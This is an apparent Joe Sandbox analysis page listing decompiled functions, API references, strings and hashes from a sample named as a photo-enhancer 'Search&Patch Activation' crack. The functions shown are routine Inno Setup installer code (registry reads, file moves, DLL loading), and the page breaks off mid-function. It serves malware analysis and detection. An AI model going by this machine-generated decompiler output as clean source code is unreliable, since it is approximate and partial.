Function 004579E4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004579E4(struct HWND__* __eax, char __edx, void* __ebp) {
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t15;
				void* _t22;
				intOrPtr* _t23;
				struct HWND__* _t29;
				void* _t30;

				_v20 = __edx;
				_t29 = __eax;
				_t22 = SendMessageA(__eax, 0xb06, 0, 0);
				if(_t22 != 0x5060100) {
					_v28 = _t22;
					_v24 = 0;
					_v20 = 0x5060100;
					_v16 = 0;
					E004090D0(_t22, "Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)", 1, 0x49f020, _t29, 1,  &_v28);
					E0040311C();
				}
				 *0x49f010 = 1;
				 *0x49f01c = _t29;
				 *0x49f020 = E0041F910(E00457E24, 0x4579d8);
				_t34 =  *0x49f020;
				if( *0x49f020 == 0) {
					E00453B40("Failed to create DebugClientWnd", _t22, 0x49f020, _t29, _t34);
				}
				_t30 = 4;
				_t23 = 0x49c938;
				do {
					E0042EEAC( *0x49f020,  *_t23);
					_t23 = _t23 + 4;
					_t30 = _t30 - 1;
				} while (_t30 != 0);
				_t15 =  *0x49f01c; // 0x0
				return SendMessageA(_t15, 0xb00,  *0x49f020, 0);
			}

0x004579ea
0x004579ed
0x00457a03
0x00457a0b
0x00457a0d
0x00457a11
0x00457a16
0x00457a1e
0x00457a36
0x00457a3b
0x00457a3b
0x00457a40
0x00457a47
0x00457a5d
0x00457a5f
0x00457a62
0x00457a69
0x00457a69
0x00457a6e
0x00457a73
0x00457a78
0x00457a7c
0x00457a81
0x00457a84
0x00457a84
0x00457a95
0x00457aa6

APIs

SendMessageA.USER32 ref: 004579FE
SendMessageA.USER32 ref: 00457A9B

Strings

Failed to create DebugClientWnd, xrefs: 00457A64
Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00457A2A

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: MessageSend
String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
API String ID: 3850602802-3720027226
Opcode ID: b03ed1056f1f7c238425172a1330e6ac177058c3a5e9163237303df94b25fdc9
Instruction ID: 1ab6ed05e85d1bb283b6b865c49c58556a26672ef247bde5bc39928aa0d5d30a
Opcode Fuzzy Hash: b03ed1056f1f7c238425172a1330e6ac177058c3a5e9163237303df94b25fdc9
Instruction Fuzzy Hash: 751123707082106FE310AB28AC81B8F7B989B15309F04807BF985DB383C3799D08C7AE

Uniqueness

Uniqueness Score: -1.00%

Function 0047A860 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E0047A860(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _t22;
				struct HWND__* _t25;
				intOrPtr _t38;
				intOrPtr _t39;
				void* _t43;
				void* _t44;
				intOrPtr _t45;

				_t43 = _t44;
				_t45 = _t44 + 0xfffffff0;
				_push(__edi);
				_v12 = 0;
				_push(_t43);
				_push(0x47a92b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45;
				_v8 = E0047A94C(1);
				_push(_t43);
				_push(0x47a904);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45;
				_v20 =  *((intOrPtr*)(_v8 + 4));
				_v16 = 0;
				E00407D84("Wnd=$%x", 0,  &_v20,  &_v12);
				_t22 =  *0x49e62c; // 0x2252410
				E00424754(_t22, _v12, __edi);
				while(1) {
					E0047A204();
					_t25 = GetFocus();
					_t38 =  *0x49e62c; // 0x2252410
					if(_t25 ==  *((intOrPtr*)(_t38 + 0x20)) && GetKeyState(0x7a) < 0) {
						break;
					}
					WaitMessage();
				}
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(E0047A90B);
				return E00402B58(_v8);
			}

0x0047a861
0x0047a863
0x0047a868
0x0047a86b
0x0047a870
0x0047a871
0x0047a876
0x0047a879
0x0047a888
0x0047a88d
0x0047a88e
0x0047a893
0x0047a896
0x0047a8a3
0x0047a8a6
0x0047a8b4
0x0047a8bc
0x0047a8c1
0x0047a8c6
0x0047a8c6
0x0047a8cb
0x0047a8d0
0x0047a8d9
0x00000000
0x00000000
0x0047a8e7
0x0047a8e7
0x0047a8f0
0x0047a8f3
0x0047a8f6
0x0047a903

APIs

Part of subcall function 00424754: SetWindowTextA.USER32(?,00000000), ref: 0042476C

GetFocus.USER32(?,00000000,0047A904,?,00000000,0047A92B,?,?,00000001,00000000,?,00482693,00000000,0048361D), ref: 0047A8CB
GetKeyState.USER32(0000007A), ref: 0047A8DD
WaitMessage.USER32(?,00000000,0047A904,?,00000000,0047A92B,?,?,00000001,00000000,?,00482693,00000000,0048361D), ref: 0047A8E7

Strings

Wnd=$%x, xrefs: 0047A8AF

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: FocusMessageStateTextWaitWindow
String ID: Wnd=$%x
API String ID: 1381870634-2927251529
Opcode ID: e5dbb5df603875cdc39d478cadb00c751de2674426fb931424df1fbe3e193bac
Instruction ID: 77d4776769ed3d961f5a478265b7c30efea3ded7fa53bcd9a53f0dfc2223b557
Opcode Fuzzy Hash: e5dbb5df603875cdc39d478cadb00c751de2674426fb931424df1fbe3e193bac
Instruction Fuzzy Hash: A91194B0604145AFC700FF66D841A9E77B8EB89714B5288B6F408E7281D73C6D208A6B

Uniqueness

Uniqueness Score: -1.00%

Function 0046FD50 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0046FD50(FILETIME* __eax, void* __edx) {
				char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				char _v40;
				signed int _v44;
				char _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				struct _SYSTEMTIME _v76;
				struct _FILETIME _v84;
				void* _t41;
				struct _FILETIME* _t46;

				_t41 = __edx;
				FileTimeToLocalFileTime(__eax, _t46);
				if(FileTimeToSystemTime( &_v84,  &_v76) == 0) {
					return E00403494(_t41, "(invalid)");
				}
				_v60 = _v76.wYear & 0x0000ffff;
				_v56 = 0;
				_v52 = _v76.wMonth & 0x0000ffff;
				_v48 = 0;
				_v44 = _v76.wDay & 0x0000ffff;
				_v40 = 0;
				_v36 = _v76.wHour & 0x0000ffff;
				_v32 = 0;
				_v28 = _v76.wMinute & 0x0000ffff;
				_v24 = 0;
				_v20 = _v76.wSecond & 0x0000ffff;
				_v16 = 0;
				_v12 = _v76.wMilliseconds & 0x0000ffff;
				_v8 = 0;
				return E00407D84("%.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u", 6,  &_v60, _t41);
			}

0x0046fd54
0x0046fd58
0x0046fd6e
0x00000000
0x0046fdef
0x0046fd76
0x0046fd7a
0x0046fd84
0x0046fd88
0x0046fd92
0x0046fd96
0x0046fda0
0x0046fda4
0x0046fdae
0x0046fdb2
0x0046fdbc
0x0046fdc0
0x0046fdca
0x0046fdce
0x00000000

APIs

FileTimeToLocalFileTime.KERNEL32(?), ref: 0046FD58
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046FD67

Strings

%.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u, xrefs: 0046FDDC
(invalid), xrefs: 0046FDEA

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Time$File$LocalSystem
String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
API String ID: 1748579591-1013271723
Opcode ID: bb060cc39148aedb455345e7bc3ff301bf93d173113d396d92c14034a51e3361
Instruction ID: 1dc787eced2517cb8807bab7c2b20f1510b2cd86f013857d73bb6b07fca1fef3
Opcode Fuzzy Hash: bb060cc39148aedb455345e7bc3ff301bf93d173113d396d92c14034a51e3361
Instruction Fuzzy Hash: CB11F8A440C3919AD340DF2AC44472BBAE4AF99704F04496EF9C8D6391E77AC948DB67

Uniqueness

Uniqueness Score: -1.00%

Function 00454772 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43
fileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00454772(void* __edx) {
				CHAR* _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				void* _t38;

				_t27 = E00403738( *((intOrPtr*)(_t38 - 0x10)));
				SetFileAttributesA(_t27, 0x20);
				if(E004073E0( *((intOrPtr*)(_t38 - 0x10))) == 0) {
					E00453C98("DeleteFile");
				}
				if(MoveFileA(E00403738( *((intOrPtr*)(_t38 - 0x14))), _t27) == 0) {
					E00453C98("MoveFile");
				}
				_pop(_t33);
				 *[fs:eax] = _t33;
				_pop(_t34);
				 *[fs:eax] = _t34;
				_push(E00454869);
				E00403420(_t38 - 0x30, 2);
				E00403420(_t38 - 0x24, 2);
				return E00403420(_t38 - 0x14, 5);
			}

0x0045477c
0x0045477f
0x0045478e
0x00454795
0x00454795
0x004547ab
0x004547b2
0x004547b2
0x004547b9
0x004547bc
0x0045482f
0x00454832
0x00454835
0x00454842
0x0045484f
0x00454861

APIs

SetFileAttributesA.KERNEL32(00000000,00000020), ref: 0045477F

Part of subcall function 004073E0: DeleteFileA.KERNEL32(00000000,0049E62C,0049B575,00000000,0049B5CA,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 004073EB

MoveFileA.KERNEL32 ref: 004547A4

Part of subcall function 00453C98: GetLastError.KERNEL32(00000000,0045482D,00000005,00000000,00454862,?,?,00000000,0049E62C,00000004,00000000,00000000,00000000,?,0049B229,00000000), ref: 00453C9B

Strings

DeleteFile, xrefs: 00454790
MoveFile, xrefs: 004547AD

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: File$AttributesDeleteErrorLastMove
String ID: DeleteFile$MoveFile
API String ID: 3024442154-139070271
Opcode ID: b6f22cc9759424c3a784986225b8e0c35bb72f21a930fd5492b6a91afa80a7cc
Instruction ID: 530c5230d1c48a198e6632d8711bb006f4eeac499d42d39edb4531016cb1c6b4
Opcode Fuzzy Hash: b6f22cc9759424c3a784986225b8e0c35bb72f21a930fd5492b6a91afa80a7cc
Instruction Fuzzy Hash: C2F086752142445AE701FFA6D84266E63ECDB8431FFA1443BFC00BB6C3DA3C9D094929

Uniqueness

Uniqueness Score: -1.00%

Function 00456240 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41
registryCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00456240(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _v8;
				void* __ecx;
				void* __ebp;
				void* _t7;
				intOrPtr _t27;
				intOrPtr _t31;
				intOrPtr _t33;

				_t31 = _t33;
				_t7 = E0042E2AC(0, "SYSTEM\\CurrentControlSet\\Control\\Session Manager", 0x80000002,  &_v8, 1, 0);
				if(_t7 != 0) {
					return _t7;
				} else {
					_push(_t31);
					_push(0x4562a4);
					_push( *[fs:eax]);
					 *[fs:eax] = _t33;
					E00456174(_v8, __ebx, "PendingFileRenameOperations", __edi, __esi, _t31);
					E00456174(_v8, __ebx, "PendingFileRenameOperations2", __edi, __esi, _t31);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x4562ab);
					return RegCloseKey(_v8);
				}
			}

0x00456241
0x00456258
0x0045625f
0x004562ad
0x00456261
0x00456263
0x00456264
0x00456269
0x0045626c
0x00456278
0x00456287
0x0045628f
0x00456292
0x00456295
0x004562a3
0x004562a3

APIs

Part of subcall function 0042E2AC: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00485FB3,?,00000001,?,?,00485FB3,?,00000001,00000000), ref: 0042E2C8

RegCloseKey.ADVAPI32(?,004562AB,?,00000001,00000000), ref: 0045629E

Strings

PendingFileRenameOperations2, xrefs: 0045627F
SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 0045624C
PendingFileRenameOperations, xrefs: 00456270

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CloseOpen
String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
API String ID: 47109696-2115312317
Opcode ID: 92624241078a00f7c1b0f08652fbe8534835c4ea1a2c908f545524f159a12353
Instruction ID: 03744892537dc61f373a56118159d2a705b6a08e7bce835c08af8ac15a0ef851
Opcode Fuzzy Hash: 92624241078a00f7c1b0f08652fbe8534835c4ea1a2c908f545524f159a12353
Instruction Fuzzy Hash: 2EF09671204604AFDB05E7A6DC13B6B73ACD744715FE245B7F900C7682DAB9ED04962C

Uniqueness

Uniqueness Score: -1.00%

Function 00465A14 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E00465A14(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				intOrPtr _t29;
				intOrPtr _t35;

				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t35);
				_push(0x465a8a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35;
				E0044BBBC(__ebx, __ecx, __edx, __edi, __esi);
				E004659E8( &_v12);
				E0042C88C(_v12,  &_v8);
				E0040357C( &_v8, "shell32.dll");
				 *0x49f0a8 = GetProcAddress(LoadLibraryA(E00403738(_v8)), "SHPathPrepareForWriteA");
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E00465A91);
				return E00403420( &_v12, 2);
			}

0x00465a17
0x00465a19
0x00465a1b
0x00465a1c
0x00465a1d
0x00465a20
0x00465a21
0x00465a26
0x00465a29
0x00465a2c
0x00465a39
0x00465a44
0x00465a51
0x00465a6a
0x00465a71
0x00465a74
0x00465a77
0x00465a89

APIs

Part of subcall function 0044BBBC: LoadLibraryA.KERNEL32(00000000,00000000,0044BF9F,?,?,?,?,00000000,00000000,?,0044FDE1,0049BA76), ref: 0044BC1E
Part of subcall function 0044BBBC: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044BC36
Part of subcall function 0044BBBC: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044BC48
Part of subcall function 0044BBBC: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044BC5A
Part of subcall function 0044BBBC: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044BC6C
Part of subcall function 0044BBBC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044BC7E
Part of subcall function 0044BBBC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044BC90
Part of subcall function 0044BBBC: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044BCA2
Part of subcall function 0044BBBC: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044BCB4
Part of subcall function 0044BBBC: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044BCC6
Part of subcall function 0044BBBC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044BCD8
Part of subcall function 0044BBBC: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044BCEA
Part of subcall function 0044BBBC: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044BCFC
Part of subcall function 0044BBBC: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044BD0E

Part of subcall function 004659E8: GetSystemDirectoryA.KERNEL32 ref: 004659FB

LoadLibraryA.KERNEL32(00000000,SHPathPrepareForWriteA,00000000,00465A8A,?,?,?,?,00000000,00000000,?,0049BA9E), ref: 00465A5F
GetProcAddress.KERNEL32(00000000,00000000), ref: 00465A65

Strings

SHPathPrepareForWriteA, xrefs: 00465A31
shell32.dll, xrefs: 00465A4C

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressProc$LibraryLoad$DirectorySystem
String ID: SHPathPrepareForWriteA$shell32.dll
API String ID: 1442766254-2683653824
Opcode ID: 05cfff7a34e17a50d2fc6620c9dc18dea8e8608a769cdc388857dffe2cd73276
Instruction ID: 40adbffb9e5bdfd27d779661ae68592eaffae07e03a1378c290830cb38e34495
Opcode Fuzzy Hash: 05cfff7a34e17a50d2fc6620c9dc18dea8e8608a769cdc388857dffe2cd73276
Instruction Fuzzy Hash: 07F04470640A08BFD701FBA2DC93F5E7BACDB45714FA0457BB400B6592E67C9E048A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00459BF4 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00459BF4(signed int __eax, void* __ecx, void* __edx, void* __ebp) {
				void* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t31;
				signed int _t33;

				_push(__ecx);
				_t31 = __edx;
				_t22 = __eax;
				_t33 = __eax & 0x0000007f;
				if( *((intOrPtr*)(0x49f044 + _t33 * 4)) == 0) {
					if(E0042E2AC(__eax, "SOFTWARE\\Microsoft\\.NETFramework", 0x80000002,  &_v16, 1, 0) == 0) {
						E0042E1DC();
						RegCloseKey(_v16);
					}
					_t37 =  *((intOrPtr*)(0x49f044 + _t33 * 4));
					if( *((intOrPtr*)(0x49f044 + _t33 * 4)) == 0) {
						E00453B40(".NET Framework not found", _t22, _t31, _t33, _t37);
					}
				}
				return E00403494(_t31,  *((intOrPtr*)(0x49f044 + _t33 * 4)));
			}

0x00459bf7
0x00459bf8
0x00459bfa
0x00459bfe
0x00459c09
0x00459c27
0x00459c38
0x00459c41
0x00459c41
0x00459c46
0x00459c4e
0x00459c55
0x00459c55
0x00459c4e
0x00459c6c

APIs

Part of subcall function 0042E2AC: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00485FB3,?,00000001,?,?,00485FB3,?,00000001,00000000), ref: 0042E2C8

RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00459D31,00000000,00459EE9,?,00000000,00000000,00000000), ref: 00459C41

Strings

InstallRoot, xrefs: 00459C30
SOFTWARE\Microsoft\.NETFramework, xrefs: 00459C14
.NET Framework not found, xrefs: 00459C50

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CloseOpen
String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
API String ID: 47109696-2631785700
Opcode ID: 8e19ad16d369bcc1cdc551d6f7a6bfc3dd5aaf0307e8b56589e706dd5174713a
Instruction ID: 38d3340ec7adb02875813bbcd1e17bd1b65749923c884860087a6e41a9d30ab7
Opcode Fuzzy Hash: 8e19ad16d369bcc1cdc551d6f7a6bfc3dd5aaf0307e8b56589e706dd5174713a
Instruction Fuzzy Hash: CEF0A9713001109BC710EB1A9881B9E63CEDB92316F24403BBA85C7353E63CCC0A8629

Uniqueness

Uniqueness Score: -1.00%

Function 00485F94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00485F94(void* __eflags) {
				void* _v8;
				int _v12;
				int _v16;
				char _v20;
				void* _t13;

				_t13 = E0042E2AC(0, "System\\CurrentControlSet\\Control\\Windows", 0x80000002,  &_v8, 1, 0);
				if(_t13 == 0) {
					_v12 = 4;
					if(RegQueryValueExA(_v8, "CSDVersion", 0,  &_v16,  &_v20,  &_v12) == 0 && _v16 == 4 && _v12 == 4) {
						 *0x49f45c = _v20;
					}
					return RegCloseKey(_v8);
				}
				return _t13;
			}

0x00485fae
0x00485fb5
0x00485fb7
0x00485fdc
0x00485fee
0x00485fee
0x00000000
0x00485ff8
0x00486000

APIs

Part of subcall function 0042E2AC: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00485FB3,?,00000001,?,?,00485FB3,?,00000001,00000000), ref: 0042E2C8

RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00485FD5
RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00485FF8

Strings

CSDVersion, xrefs: 00485FCC
System\CurrentControlSet\Control\Windows, xrefs: 00485FA2

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: CSDVersion$System\CurrentControlSet\Control\Windows
API String ID: 3677997916-1910633163
Opcode ID: 6218c6c2fb9451a17f77c2bb797b492f1626bc5d3910a3f1f10820abaf446096
Instruction ID: 690f3357d7f3b8f107864325de2190f20260369eddc5d30bd8c99057d7f378d2
Opcode Fuzzy Hash: 6218c6c2fb9451a17f77c2bb797b492f1626bc5d3910a3f1f10820abaf446096
Instruction Fuzzy Hash: D9F04475A40208EADF10EAD58C45BDF73BC9B04704F104567EB10E7280EB39AA04CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0042DD80 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0042DD80(void* __eax) {
				char _v268;
				_Unknown_base(*)()* _t6;
				void* _t9;
				void* _t13;

				_t9 = __eax;
				E00403400(__eax);
				_t6 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetSystemWow64DirectoryA");
				if(_t6 != 0) {
					_t6 =  *_t6( &_v268, 0x105);
					if(_t6 > 0 && _t6 < 0x105) {
						return E0040355C(_t9, 0x105, _t13);
					}
				}
				return _t6;
			}

0x0042dd87
0x0042dd8b
0x0042dda0
0x0042dda7
0x0042ddb3
0x0042ddb7
0x00000000
0x0042ddc9
0x0042ddb7
0x0042ddd5

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00454356,00000000,004543F9,?,?,00000000,00000000,00000000,00000000,00000000,?,004547E9,00000000), ref: 0042DD9A
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042DDA0

Strings

kernel32.dll, xrefs: 0042DD95
GetSystemWow64DirectoryA, xrefs: 0042DD90

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetSystemWow64DirectoryA$kernel32.dll
API String ID: 1646373207-4063490227
Opcode ID: 90681687b24dd86f9c3e273dd486589356378cd60c5b464a2f7951d6e4eef599
Instruction ID: 364facf3dcd8fd4fb48bac821a112922c1d8aa8d1bb3947713f5e14a9d28bbdd
Opcode Fuzzy Hash: 90681687b24dd86f9c3e273dd486589356378cd60c5b464a2f7951d6e4eef599
Instruction Fuzzy Hash: 8EE026A1B60F0113D700317A5C8375B208E4F84718F90043F3984F52C2DDBCD988462D

Uniqueness

Uniqueness Score: -1.00%

Function 0042EFE4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E0042EFE4(void* __eax) {
				intOrPtr* _t7;
				void* _t8;

				_t8 = __eax;
				_t7 = GetProcAddress(GetModuleHandleA("user32.dll"), "ShutdownBlockReasonDestroy");
				if(_t7 == 0) {
					L2:
					return 0;
				} else {
					_push(_t8);
					if( *_t7() != 0) {
